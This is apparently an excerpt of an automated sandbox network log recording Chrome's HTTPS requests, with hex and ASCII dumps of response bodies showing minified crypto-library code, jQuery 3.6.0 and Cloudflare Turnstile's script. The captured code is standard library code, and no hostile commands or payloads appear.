                            2024-12-18 20:05:34 UTC1369INData Raw: 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d 6f 29 74 68 69
                            Data Ascii: t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)thi
                            2024-12-18 20:05:34 UTC1369INData Raw: 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c
                            Data Ascii: s._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0)|0,
                            2024-12-18 20:05:34 UTC1369INData Raw: 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31 36 29 7c 30
                            Data Ascii: <8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>16)|0
                            2024-12-18 20:05:34 UTC1369INData Raw: 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 74
                            Data Ascii: ffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:function(t
                            2024-12-18 20:05:34 UTC1369INData Raw: 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59
                            Data Ascii: ;return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXY
                            2024-12-18 20:05:34 UTC1369INData Raw: 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77
                            Data Ascii: ))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._hash.w
                            2024-12-18 20:05:34 UTC1369INData Raw: 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c 62 3d 44
                            Data Ascii: ,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b=D


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.449750151.101.66.1374433980C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 20:05:34 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                            Host: code.jquery.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 20:05:34 UTC613INHTTP/1.1 200 OK
                            Connection: close
                            Content-Length: 89501
                            Server: nginx
                            Content-Type: application/javascript; charset=utf-8
                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                            ETag: "28feccc0-15d9d"
                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                            Access-Control-Allow-Origin: *
                            Cross-Origin-Resource-Policy: cross-origin
                            Via: 1.1 varnish, 1.1 varnish
                            Accept-Ranges: bytes
                            Date: Wed, 18 Dec 2024 20:05:34 GMT
                            Age: 3073866
                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740028-EWR
                            X-Cache: HIT, HIT
                            X-Cache-Hits: 2774, 4
                            X-Timer: S1734552334.358037,VS0,VE0
                            Vary: Accept-Encoding
                            2024-12-18 20:05:34 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                            2024-12-18 20:05:34 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                            Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                            2024-12-18 20:05:34 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                            Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                            2024-12-18 20:05:34 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                            Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                            2024-12-18 20:05:34 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                            Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                            2024-12-18 20:05:34 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                            Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.449752104.18.95.414433980C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 20:05:35 UTC383OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 20:05:36 UTC471INHTTP/1.1 200 OK
                            Date: Wed, 18 Dec 2024 20:05:36 GMT
                            Content-Type: application/javascript; charset=UTF-8
                            Content-Length: 47692
                            Connection: close
                            accept-ranges: bytes
                            last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                            access-control-allow-origin: *
                            cross-origin-resource-policy: cross-origin
                            Server: cloudflare
                            CF-RAY: 8f41c4c3fa7e43c2-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-12-18 20:05:36 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                            Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                            2024-12-18 20:05:36 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                            Data Ascii: t(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                            2024-12-18 20:05:36 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 70 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 70 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 70 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 70 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 70 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 70 3d 5b 70 5b 30 5d 26 32 2c 75 2e 76 61 6c
                            Data Ascii: ])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.val
                            2024-12-18 20:05:36 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 4f 56 45 52 52 55 4e 3d 22 76 65 72 69 66 79 69 6e 67 2d 6f 76 65 72 72 75 6e 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69
